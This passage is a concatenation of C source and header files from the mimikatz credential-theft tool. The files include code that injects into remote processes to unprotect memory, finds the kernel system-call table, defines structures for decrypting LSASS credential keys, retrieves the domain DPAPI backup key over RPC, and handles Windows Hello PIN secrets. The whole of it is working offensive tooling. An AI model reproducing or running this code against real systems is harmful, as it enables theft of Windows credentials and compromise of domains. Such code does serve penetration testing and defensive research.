| NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[]); 39 | 40 | NTSTATUS kuhl_m_kerberos_hash_data_raw(LONG keyType, PCUNICODE_STRING pString, PCUNICODE_STRING pSalt, DWORD count, PBYTE *buffer, DWORD *dwBuffer); 41 | NTSTATUS kuhl_m_kerberos_hash_data(LONG keyType, PCUNICODE_STRING pString, PCUNICODE_STRING pSalt, DWORD count); 42 | wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext); 43 | wchar_t * kuhl_m_kerberos_generateFileName_short(PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext); 44 | NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt); -------------------------------------------------------------------------------- /modules/kull_m_crypto_remote.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_crypto_remote.h" 7 | 8 | #pragma optimize("", off) 9 | DWORD WINAPI kull_m_crypto_remote_thread_CryptProtectMemory_Generic(PREMOTE_LIB_DATA lpParameter) // to Protect & Unprotect 10 | { 11 | lpParameter->output.outputData = lpParameter->input.inputData; 12 | lpParameter->output.outputSize = lpParameter->input.inputSize; 13 | lpParameter->output.outputStatus = ((PCRYPTUNPROTECTMEMORY) 0x4141414141414141)(lpParameter->input.inputData, lpParameter->input.inputSize, lpParameter->input.inputDword); 14 | 15 | return STATUS_SUCCESS; 16 | } 17 | DWORD kull_m_crypto_remote_thread_CryptProtectMemory_Generic_end(){return 'kipr';} 18 | #pragma optimize("", on) 19 | 20 | BOOL WINAPI kull_m_crypto_remote_CryptProtectMemory_Generic(__in PKULL_M_MEMORY_HANDLE hProcess, __in BOOL bIsProtect, __inout LPVOID pDataIn, __in DWORD cbDataIn, __in DWORD dwFlags) 21 | { 22 | BOOL status = FALSE; 23 | PREMOTE_LIB_INPUT_DATA iData; 24 | REMOTE_LIB_OUTPUT_DATA oData; 25 | 26 | REMOTE_EXT extensions[] = { 27 | {L"dpapi.dll", "CryptProtectMemory", (PVOID) 0x4141414141414141, NULL}, 28 | {L"dpapi.dll", "CryptUnprotectMemory", (PVOID) 0x4141414141414141, NULL}, 29 | }; 30 | MULTIPLE_REMOTE_EXT extForCb = {1, bIsProtect ? &extensions[0] : &extensions[1]}; 31 | KULL_M_MEMORY_ADDRESS aRemoteFunc; 32 | 33 | if(kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(hProcess, kull_m_crypto_remote_thread_CryptProtectMemory_Generic, (DWORD) ((PBYTE) kull_m_crypto_remote_thread_CryptProtectMemory_Generic_end - (PBYTE) kull_m_crypto_remote_thread_CryptProtectMemory_Generic), &extForCb, &aRemoteFunc)) 34 | { 35 | if(iData = kull_m_remotelib_CreateInput(NULL, dwFlags, cbDataIn, pDataIn)) 36 | { 37 | if(kull_m_remotelib_create(&aRemoteFunc, iData, &oData)) 38 | { 39 | status = (BOOL) oData.outputStatus; 40 | 41 | if(status) 42 | { 43 | RtlCopyMemory(pDataIn, oData.outputData, min(cbDataIn, oData.outputSize)); 44 | } 45 | // LocalFree oData.outputData ? 46 | } 47 | LocalFree(iData); 48 | } 49 | kull_m_memory_free(&aRemoteFunc); 50 | } 51 | else PRINT_ERROR(L"kull_m_remotelib_CreateRemoteCodeWitthPatternReplace\n"); 52 | 53 | return status; 54 | } -------------------------------------------------------------------------------- /modules/kull_m_patch.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "kull_m_memory.h" 8 | #include "kull_m_service.h" 9 | #include "kull_m_process.h" 10 | 11 | typedef NTSTATUS (* PKULL_M_PATCH_CALLBACK) (int argc, wchar_t * args[]); 12 | 13 | typedef struct _KULL_M_PATCH_PATTERN { 14 | DWORD Length; 15 | BYTE *Pattern; 16 | } KULL_M_PATCH_PATTERN, *PKULL_M_PATCH_PATTERN; 17 | 18 | typedef struct _KULL_M_PATCH_OFFSETS { 19 | LONG off0; 20 | #if defined(_M_ARM64) 21 | LONG armOff0; 22 | #endif 23 | LONG off1; 24 | #if defined(_M_ARM64) 25 | LONG armOff1; 26 | #endif 27 | LONG off2; 28 | #if defined(_M_ARM64) 29 | LONG armOff2; 30 | #endif 31 | LONG off3; 32 | #if defined(_M_ARM64) 33 | LONG armOff3; 34 | #endif 35 | LONG off4; 36 | #if defined(_M_ARM64) 37 | LONG armOff4; 38 | #endif 39 | LONG off5; 40 | #if defined(_M_ARM64) 41 | LONG armOff5; 42 | #endif 43 | LONG off6; 44 | #if defined(_M_ARM64) 45 | LONG armOff6; 46 | #endif 47 | LONG off7; 48 | #if defined(_M_ARM64) 49 | LONG armOff7; 50 | #endif 51 | LONG off8; 52 | #if defined(_M_ARM64) 53 | LONG armOff8; 54 | #endif 55 | LONG off9; 56 | #if defined(_M_ARM64) 57 | LONG armOff9; 58 | #endif 59 | } KULL_M_PATCH_OFFSETS, *PKULL_M_PATCH_OFFSETS; 60 | 61 | typedef struct _KULL_M_PATCH_GENERIC { 62 | DWORD MinBuildNumber; 63 | KULL_M_PATCH_PATTERN Search; 64 | KULL_M_PATCH_PATTERN Patch; 65 | KULL_M_PATCH_OFFSETS Offsets; 66 | } KULL_M_PATCH_GENERIC, *PKULL_M_PATCH_GENERIC; 67 | 68 | typedef struct _KULL_M_PATCH_MULTIPLE { 69 | KULL_M_PATCH_PATTERN Search; 70 | KULL_M_PATCH_PATTERN Patch; 71 | LONG Offset; 72 | KULL_M_MEMORY_ADDRESS AdressOfPatch; 73 | DWORD OldProtect; 74 | KULL_M_MEMORY_ADDRESS LocalBackup; 75 | } KULL_M_PATCH_MULTIPLE, *PKULL_M_PATCH_MULTIPLE; 76 | 77 | BOOL kull_m_patch(PKULL_M_MEMORY_SEARCH sMemory, PKULL_M_MEMORY_ADDRESS pPattern, SIZE_T szPattern, PKULL_M_MEMORY_ADDRESS pPatch, SIZE_T szPatch, LONG offsetOfPatch, PKULL_M_PATCH_CALLBACK pCallBackBeforeRestore, int argc, wchar_t * args[], NTSTATUS * pRetCallBack); 78 | PKULL_M_PATCH_GENERIC kull_m_patch_getGenericFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, DWORD BuildNumber); 79 | BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PCWSTR processOrService, PCWSTR moduleName, BOOL isService); -------------------------------------------------------------------------------- /mimidrv/kkll_m_ssdt.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kkll_m_ssdt.h" 7 | 8 | #if defined(_M_X64) 9 | PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable = NULL; 10 | #endif 11 | 12 | NTSTATUS kkll_m_ssdt_list(PKIWI_BUFFER outBuffer) 13 | { 14 | NTSTATUS status; 15 | USHORT idxFunction; 16 | ULONG_PTR funcAddr; 17 | 18 | #if defined(_M_X64) 19 | status = kkll_m_ssdt_getKeServiceDescriptorTable(); 20 | if(NT_SUCCESS(status)) 21 | { 22 | #endif 23 | status = kprintf(outBuffer, L"KeServiceDescriptorTable : 0x%p (%u)\n", KeServiceDescriptorTable, KeServiceDescriptorTable->TableSize); 24 | for(idxFunction = 0; (idxFunction < KeServiceDescriptorTable->TableSize) && NT_SUCCESS(status) ; idxFunction++) 25 | { 26 | #if defined(_M_IX86) 27 | funcAddr = (ULONG_PTR) KeServiceDescriptorTable->ServiceTable[idxFunction]; 28 | #else 29 | funcAddr = (ULONG_PTR) KeServiceDescriptorTable->OffsetToService; 30 | if(KiwiOsIndex < KiwiOsIndex_VISTA) 31 | funcAddr += KeServiceDescriptorTable->OffsetToService[idxFunction] & ~EX_FAST_REF_MASK; 32 | else 33 | funcAddr += KeServiceDescriptorTable->OffsetToService[idxFunction] >> 4; 34 | #endif 35 | status = kprintf(outBuffer, L"[%5u] ", idxFunction); 36 | if(NT_SUCCESS(status)) 37 | status = kkll_m_modules_fromAddr(outBuffer, (PVOID) funcAddr); 38 | } 39 | #if defined(_M_X64) 40 | } 41 | #endif 42 | return status; 43 | } 44 | 45 | #if defined(_M_X64) 46 | const UCHAR PTRN_WALL_Ke[] = {/*0x00, 0x00, 0x4d, 0x0f, 0x45,*/ 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83}; 47 | const UCHAR PTRN_W1803_Ke[] = {0xd3, 0x41, 0x3b, 0x44, 0x3a, 0x10, 0x0f, 0x83}; 48 | const LONG OFFS_WNO8_Ke = -24;//-19; 49 | const LONG OFFS_WIN8_Ke = -21;//-16; 50 | const LONG OFFS_WIN10A_Ke = -38;//-16; 51 | NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable() 52 | { 53 | NTSTATUS status = STATUS_NOT_FOUND; 54 | if(KeServiceDescriptorTable) 55 | status = STATUS_SUCCESS; 56 | else 57 | { 58 | status = kkll_m_memory_genericPointerSearch( 59 | (PUCHAR *) &KeServiceDescriptorTable, 60 | ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), 61 | ((PUCHAR) ZwUnloadKey) + (19 * PAGE_SIZE), 62 | (KiwiOsIndex < KiwiOsIndex_10_1803) ? PTRN_WALL_Ke : PTRN_W1803_Ke, 63 | (KiwiOsIndex < KiwiOsIndex_10_1803) ? sizeof(PTRN_WALL_Ke) : sizeof(PTRN_W1803_Ke), 64 | (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke); 65 | } 66 | return status; 67 | } 68 | #endif -------------------------------------------------------------------------------- /modules/kull_m_net.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_net.h" 7 | 8 | BOOL kull_m_net_getCurrentDomainInfo(PPOLICY_DNS_DOMAIN_INFO * pDomainInfo) 9 | { 10 | BOOL status = FALSE; 11 | LSA_HANDLE hLSA; 12 | LSA_OBJECT_ATTRIBUTES oaLsa = {0}; 13 | 14 | if(NT_SUCCESS(LsaOpenPolicy(NULL, &oaLsa, POLICY_VIEW_LOCAL_INFORMATION, &hLSA))) 15 | { 16 | status = NT_SUCCESS(LsaQueryInformationPolicy(hLSA, PolicyDnsDomainInformation, (PVOID *) pDomainInfo)); 17 | LsaClose(hLSA); 18 | } 19 | return status; 20 | } 21 | 22 | BOOL kull_m_net_CreateWellKnownSid(WELL_KNOWN_SID_TYPE WellKnownSidType, PSID DomainSid, PSID * pSid) 23 | { 24 | BOOL status = FALSE; 25 | DWORD szNeeded = 0, dwError; 26 | CreateWellKnownSid(WellKnownSidType, DomainSid, NULL, &szNeeded); 27 | dwError = GetLastError(); 28 | if((dwError == ERROR_INVALID_PARAMETER) || (dwError == ERROR_INSUFFICIENT_BUFFER)) 29 | if(*pSid = (PSID) LocalAlloc(LPTR, szNeeded)) 30 | if(!(status = CreateWellKnownSid(WellKnownSidType, DomainSid, *pSid, &szNeeded))) 31 | *pSid = LocalFree(*pSid); 32 | return status; 33 | } 34 | 35 | BOOL kull_m_net_getDC(LPCWSTR fullDomainName, DWORD altFlags, LPWSTR * fullDCName) 36 | { 37 | BOOL status = FALSE; 38 | DWORD ret, size; 39 | PDOMAIN_CONTROLLER_INFO cInfo = NULL; 40 | ret = DsGetDcName(NULL, fullDomainName, NULL, NULL, altFlags | DS_IS_DNS_NAME | DS_RETURN_DNS_NAME, &cInfo); 41 | if(ret == ERROR_SUCCESS) 42 | { 43 | size = (DWORD) (wcslen(cInfo->DomainControllerName + 2) + 1) * sizeof(wchar_t); 44 | if(*fullDCName = (wchar_t *) LocalAlloc(LPTR, size)) 45 | { 46 | status = TRUE; 47 | RtlCopyMemory(*fullDCName, cInfo->DomainControllerName + 2, size); 48 | } 49 | NetApiBufferFree(cInfo); 50 | } 51 | else PRINT_ERROR(L"DsGetDcName: %u\n", ret); 52 | return status; 53 | } 54 | 55 | BOOL kull_m_net_getComputerName(BOOL isFull, LPWSTR *name) 56 | { 57 | BOOL status = FALSE; 58 | COMPUTER_NAME_FORMAT ft = isFull ? ComputerNamePhysicalDnsFullyQualified : ComputerNamePhysicalNetBIOS; 59 | DWORD dwSize = 0; 60 | if(!GetComputerNameEx(ft, NULL, &dwSize) && (GetLastError() == ERROR_MORE_DATA)) 61 | { 62 | if(*name = (wchar_t *) LocalAlloc(LPTR, dwSize * sizeof(wchar_t))) 63 | { 64 | if(!(status = GetComputerNameEx(ft, *name, &dwSize))) 65 | { 66 | PRINT_ERROR_AUTO(L"GetComputerNameEx(data)"); 67 | LocalFree(*name); 68 | } 69 | } 70 | } 71 | else PRINT_ERROR_AUTO(L"GetComputerNameEx(init)"); 72 | return status; 73 | } -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_bkrp.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_rpc_bkrp.h" 7 | 8 | BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding) 9 | { 10 | BOOL status = FALSE; 11 | LPWSTR szTmpDc = NULL; 12 | if(!NetworkAddr) 13 | if(kull_m_net_getDC(NULL, DS_WRITABLE_REQUIRED, &szTmpDc)) 14 | NetworkAddr = szTmpDc; 15 | if(NetworkAddr) 16 | status = kull_m_rpc_createBinding(NULL, L"ncacn_np", NetworkAddr, L"\\pipe\\protected_storage", L"ProtectedStorage", TRUE, (MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, RPC_C_IMP_LEVEL_IMPERSONATE, hBinding, NULL); 17 | if(szTmpDc) 18 | LocalFree(szTmpDc); 19 | return status; 20 | } 21 | 22 | BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut) 23 | { 24 | BOOL status = FALSE; 25 | RPC_BINDING_HANDLE hBinding; 26 | NET_API_STATUS netStatus; 27 | PBYTE out = NULL; 28 | *pDataOut = NULL; 29 | *pdwDataOut = 0; 30 | if(kull_m_rpc_bkrp_createBinding(NetworkAddr, &hBinding)) 31 | { 32 | RpcTryExcept 33 | { 34 | netStatus = BackuprKey(hBinding, (GUID *) pGuid, (PBYTE) DataIn, dwDataIn, &out, pdwDataOut, 0); 35 | if(status = (netStatus == 0)) 36 | { 37 | if(*pDataOut = LocalAlloc(LPTR, *pdwDataOut)) 38 | RtlCopyMemory(*pDataOut, out, *pdwDataOut); 39 | MIDL_user_free(out); 40 | } 41 | else PRINT_ERROR(L"BackuprKey: 0x%08x (%u)\n", netStatus, netStatus); 42 | } 43 | RpcExcept(RPC_EXCEPTION) 44 | PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode()); 45 | RpcEndExcept 46 | kull_m_rpc_deleteBinding(&hBinding); 47 | } 48 | return status; 49 | } 50 | 51 | BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut) 52 | { 53 | return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RESTORE_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut); 54 | } 55 | 56 | BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut) 57 | { 58 | return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_BACKUP_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut); 59 | } 60 | 61 | BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut) 62 | { 63 | BYTE dataIn = 'k'; 64 | return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, &dataIn, 0, pDataOut, pdwDataOut); 65 | } -------------------------------------------------------------------------------- /plog/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt6.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "../globals_sekurlsa.h" 8 | 9 | // generic in KULL_M_CRYPTO.H 10 | typedef struct _KIWI_BCRYPT_KEY8 { 11 | ULONG size; 12 | ULONG tag; // 'MSSK' 13 | ULONG type; 14 | ULONG unk0; 15 | ULONG unk1; 16 | ULONG unk2; 17 | ULONG unk3; 18 | PVOID unk4; // before, align in x64 19 | KIWI_HARD_KEY hardkey; 20 | } KIWI_BCRYPT_KEY8, *PKIWI_BCRYPT_KEY8; 21 | 22 | typedef struct _KIWI_BCRYPT_KEY81 { 23 | ULONG size; 24 | ULONG tag; // 'MSSK' 25 | ULONG type; 26 | ULONG unk0; 27 | ULONG unk1; 28 | ULONG unk2; 29 | ULONG unk3; 30 | ULONG unk4; 31 | PVOID unk5; // before, align in x64 32 | ULONG unk6; 33 | ULONG unk7; 34 | ULONG unk8; 35 | ULONG unk9; 36 | KIWI_HARD_KEY hardkey; 37 | } KIWI_BCRYPT_KEY81, *PKIWI_BCRYPT_KEY81; 38 | 39 | typedef struct _KIWI_BCRYPT_HANDLE_KEY { 40 | ULONG size; 41 | ULONG tag; // 'UUUR' 42 | PVOID hAlgorithm; 43 | PKIWI_BCRYPT_KEY key; 44 | PVOID unk0; 45 | } KIWI_BCRYPT_HANDLE_KEY, *PKIWI_BCRYPT_HANDLE_KEY; 46 | 47 | typedef struct _KIWI_BCRYPT_GEN_KEY { 48 | BCRYPT_ALG_HANDLE hProvider; 49 | BCRYPT_KEY_HANDLE hKey; 50 | PBYTE pKey; 51 | ULONG cbKey; 52 | } KIWI_BCRYPT_GEN_KEY, *PKIWI_BCRYPT_GEN_KEY; 53 | 54 | typedef NTSTATUS (WINAPI * PBCRYPT_ENCRYPT) (__inout BCRYPT_KEY_HANDLE hKey, __in_bcount_opt(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in_opt VOID *pPaddingInfo, __inout_bcount_opt(cbIV) PUCHAR pbIV, __in ULONG cbIV, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags); 55 | 56 | NTSTATUS kuhl_m_sekurlsa_nt6_init(); 57 | NTSTATUS kuhl_m_sekurlsa_nt6_clean(); 58 | const PLSA_PROTECT_MEMORY kuhl_m_sekurlsa_nt6_pLsaProtectMemory, kuhl_m_sekurlsa_nt6_pLsaUnprotectMemory; 59 | 60 | NTSTATUS kuhl_m_sekurlsa_nt6_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule); 61 | BOOL kuhl_m_sekurlsa_nt6_acquireKey(PKULL_M_MEMORY_ADDRESS aLsassMemory, PKUHL_M_SEKURLSA_OS_CONTEXT pOs, PKIWI_BCRYPT_GEN_KEY pGenKey, LONG armOffset); // TODO:ARM64 62 | 63 | NTSTATUS kuhl_m_sekurlsa_nt6_LsaInitializeProtectedMemory(); 64 | VOID kuhl_m_sekurlsa_nt6_LsaCleanupProtectedMemory(); 65 | NTSTATUS kuhl_m_sekurlsa_nt6_LsaEncryptMemory(PUCHAR pMemory, ULONG cbMemory, BOOL Encrypt); 66 | VOID WINAPI kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(IN PVOID Buffer, IN ULONG BufferSize); 67 | VOID WINAPI kuhl_m_sekurlsa_nt6_LsaProtectMemory(IN PVOID Buffer, IN ULONG BufferSize); -------------------------------------------------------------------------------- /modules/kull_m_crypto_ngc.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kull_m_crypto.h" 9 | #include "kull_m_crypto_sk.h" 10 | 11 | typedef struct _KIWI_POPKEY { 12 | DWORD version; 13 | DWORD type; // 1 soft, 2 hard 14 | BYTE key[ANYSIZE_ARRAY]; 15 | } KIWI_POPKEY, *PKIWI_POPKEY; 16 | 17 | typedef struct _KIWI_POPKEY_HARD { 18 | DWORD version; 19 | DWORD cbName; 20 | DWORD cbKey; 21 | BYTE data[ANYSIZE_ARRAY]; 22 | } KIWI_POPKEY_HARD, *PKIWI_POPKEY_HARD; 23 | 24 | typedef struct _KIWI_NGC_CREDENTIAL { 25 | DWORD dwVersion; 26 | DWORD cbEncryptedKey; 27 | DWORD cbIV; 28 | DWORD cbEncryptedPassword; 29 | DWORD cbUnk; 30 | BYTE Data[ANYSIZE_ARRAY]; 31 | // ... 32 | } KIWI_NGC_CREDENTIAL, *PKIWI_NGC_CREDENTIAL; 33 | 34 | typedef struct _UNK_PIN { 35 | DWORD cbData; 36 | DWORD unk0; 37 | PWSTR pData; 38 | } UNK_PIN, *PUNK_PIN; 39 | 40 | typedef struct _UNK_PADDING { 41 | DWORD unk0; 42 | DWORD unk1; 43 | PUNK_PIN pin; 44 | } UNK_PADDING, *PUNK_PADDING; 45 | 46 | typedef SECURITY_STATUS (WINAPI * PNCRYPTKEYDERIVATION) (NCRYPT_KEY_HANDLE hKey, NCryptBufferDesc *pParameterList, PUCHAR pbDerivedKey, DWORD cbDerivedKey, DWORD *pcbResult, ULONG dwFlags); // tofix 47 | typedef NTSTATUS (WINAPI * PNGCSIGNWITHSYMMETRICPOPKEY) (PBYTE pbKey, DWORD cbKey, PBYTE pbLabel, DWORD cbLabel, PBYTE pbContext, DWORD cbContext, PBYTE pbData, DWORD cbData, PBYTE *ppbOutput, PDWORD pcbOutput); // tofix 48 | 49 | BOOL kull_m_crypto_ngc_keyvalue_derived_software(PBYTE pbLabel, DWORD cbLabel, PBYTE pbContext, DWORD cbContext, LPCBYTE Key, DWORD cbKey, PBYTE DerivedKey, DWORD cbDerivedKey); 50 | BOOL kull_m_crypto_ngc_keyvalue_derived_hardware(PBYTE pbLabel, DWORD cbLabel, PBYTE pbContext, DWORD cbContext, LPCWSTR TransportKeyName, LPCBYTE Key, DWORD cbKey, PBYTE DerivedKey, DWORD cbDerivedKey); 51 | BOOL kull_m_crypto_ngc_signature_derived(LPCBYTE pcbKey, DWORD cbKey, LPCBYTE pcbData, DWORD cbData, LPBYTE pbHash, DWORD cbHash); 52 | BOOL kull_m_crypto_ngc_signature_pop(PBYTE pbKey, DWORD cbKey, PBYTE pbLabel, DWORD cbLabel, PBYTE pbContext, DWORD cbContext, PBYTE pbData, DWORD cbData, PBYTE *ppbOutput, PDWORD pcbOutput); 53 | 54 | PBYTE kull_m_crypto_ngc_pin_BinaryPinToPinProperty(LPCBYTE pbBinary, DWORD cbBinary, DWORD *pcbResult); 55 | SECURITY_STATUS kull_m_crypto_ngc_hardware_unseal(NCRYPT_PROV_HANDLE hProv, LPCBYTE pbPin, DWORD cbPin, LPCBYTE pbInput, DWORD cbInput, PBYTE *ppOutput, DWORD *pcbOutput); 56 | SECURITY_STATUS kull_m_crypto_ngc_software_decrypt(NCRYPT_PROV_HANDLE hProv, LPCWSTR szKeyName, LPCBYTE pbPin, DWORD cbPin, LPCBYTE pbInput, DWORD cbInput, PBYTE *ppOutput, DWORD *pcbOutput); -------------------------------------------------------------------------------- /modules/kull_m_mifare.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | 9 | #define MIFARE_CLASSIC_KEY_SIZE 6 10 | #define MIFARE_CLASSIC_SECTORS 16 11 | #define MIFARE_CLASSIC_BLOCKS_PER_SECTOR 4 12 | #define MIFARE_CLASSIC_BLOCK_SIZE 16 13 | #define MIFARE_CLASSIC_UID_SIZE 4 // ok, I know about 7 or 10 too... 14 | 15 | #define MIFARE_CLASSIC_CMD_REQUEST 0x26 // 7b, ISO/IEC 1443 -> REQA 16 | #define MIFARE_CLASSIC_CMD_WAKEUP 0x52 // 7b, ISO/IEC 1443 -> WUPA 17 | #define MIFARE_CLASSIC_CMD_ANTICOL_CL1 0x93, 0x20 18 | #define MIFARE_CLASSIC_CMD_SELECT_CL1 0x93, 0x70 19 | #define MIFARE_CLASSIC_CMD_ANTICOL_CL2 0x95, 0x20 20 | #define MIFARE_CLASSIC_CMD_SELECT_CL2 0x95, 0x70 21 | #define MIFARE_CLASSIC_CMD_HALT 0x50, 0x00 22 | #define MIFARE_CLASSIC_CMD_AUTH_KEY_A 0x60 23 | #define MIFARE_CLASSIC_CMD_AUTH_KEY_B 0x61 24 | #define MIFARE_CLASSIC_CMD_PERSONALIZE_UID_USAGE 0x40 25 | #define MIFARE_CLASSIC_CMD_SET_MOD_TYPE 0x43 26 | #define MIFARE_CLASSIC_CMD_READ 0x30 27 | #define MIFARE_CLASSIC_CMD_WRITE 0xa0 28 | #define MIFARE_CLASSIC_CMD_DECREMENT 0xc0 29 | #define MIFARE_CLASSIC_CMD_INCREMENT 0xc1 30 | #define MIFARE_CLASSIC_CMD_RESTORE 0xc2 31 | #define MIFARE_CLASSIC_CMD_TRANSFER 0xb0 32 | 33 | #define MIFARE_ULTRALIGHT_WRITE_4B 0xa2 34 | 35 | typedef struct _MIFARE_CLASSIC_ACCESS_BITS { 36 | unsigned not_c1_0: 1; 37 | unsigned not_c1_1: 1; 38 | unsigned not_c1_2: 1; 39 | unsigned not_c1_3: 1; 40 | unsigned not_c2_0: 1; 41 | unsigned not_c2_1: 1; 42 | unsigned not_c2_2: 1; 43 | unsigned not_c2_3: 1; 44 | unsigned not_c3_0: 1; 45 | unsigned not_c3_1: 1; 46 | unsigned not_c3_2: 1; 47 | unsigned not_c3_3: 1; 48 | unsigned c1_0: 1; 49 | unsigned c1_1: 1; 50 | unsigned c1_2: 1; 51 | unsigned c1_3: 1; 52 | unsigned c2_0: 1; 53 | unsigned c2_1: 1; 54 | unsigned c2_2: 1; 55 | unsigned c2_3: 1; 56 | unsigned c3_0: 1; 57 | unsigned c3_1: 1; 58 | unsigned c3_2: 1; 59 | unsigned c3_3: 1; 60 | 61 | unsigned data: 8; 62 | } MIFARE_CLASSIC_ACCESS_BITS, *PMIFARE_CLASSIC_ACCESS_BITS; 63 | 64 | 65 | typedef struct _MIFARE_CLASSIC_RAW_BLOCK { 66 | BYTE data[MIFARE_CLASSIC_BLOCK_SIZE]; 67 | } MIFARE_CLASSIC_RAW_BLOCK, *PMIFARE_CLASSIC_RAW_BLOCK; 68 | 69 | typedef struct _MIFARE_CLASSIC_RAW_SECTOR { 70 | MIFARE_CLASSIC_RAW_BLOCK blocks[MIFARE_CLASSIC_BLOCKS_PER_SECTOR]; 71 | } MIFARE_CLASSIC_RAW_SECTOR, *PMIFARE_CLASSIC_RAW_SECTOR; 72 | 73 | typedef struct _MIFARE_CLASSIC_RAW_CARD { 74 | MIFARE_CLASSIC_RAW_SECTOR sectors[MIFARE_CLASSIC_SECTORS]; 75 | } MIFARE_CLASSIC_RAW_CARD, *PMIFARE_CLASSIC_RAW_CARD; -------------------------------------------------------------------------------- /modules/kull_m_kernel.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_kernel.h" 7 | 8 | BOOL kull_m_kernel_ioctl_handle(HANDLE hDriver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer) 9 | { 10 | BOOL status = FALSE; 11 | DWORD lStatus = ERROR_MORE_DATA, returned; 12 | 13 | if(!autobuffer) 14 | { 15 | status = DeviceIoControl(hDriver, ioctlCode, bufferIn, szBufferIn, pBufferOut ? *pBufferOut : NULL, pSzBufferOut ? *pSzBufferOut : 0, &returned, NULL); 16 | } 17 | else 18 | { 19 | for(*pSzBufferOut = 0x10000; (lStatus == ERROR_MORE_DATA) && (*pBufferOut = LocalAlloc(LPTR, *pSzBufferOut)) ; *pSzBufferOut <<= 1) 20 | { 21 | if(status = DeviceIoControl(hDriver, ioctlCode, bufferIn, szBufferIn, *pBufferOut, *pSzBufferOut, &returned, NULL)) 22 | { 23 | lStatus = ERROR_SUCCESS; 24 | } 25 | else 26 | { 27 | lStatus = GetLastError(); 28 | if(lStatus == ERROR_MORE_DATA) 29 | 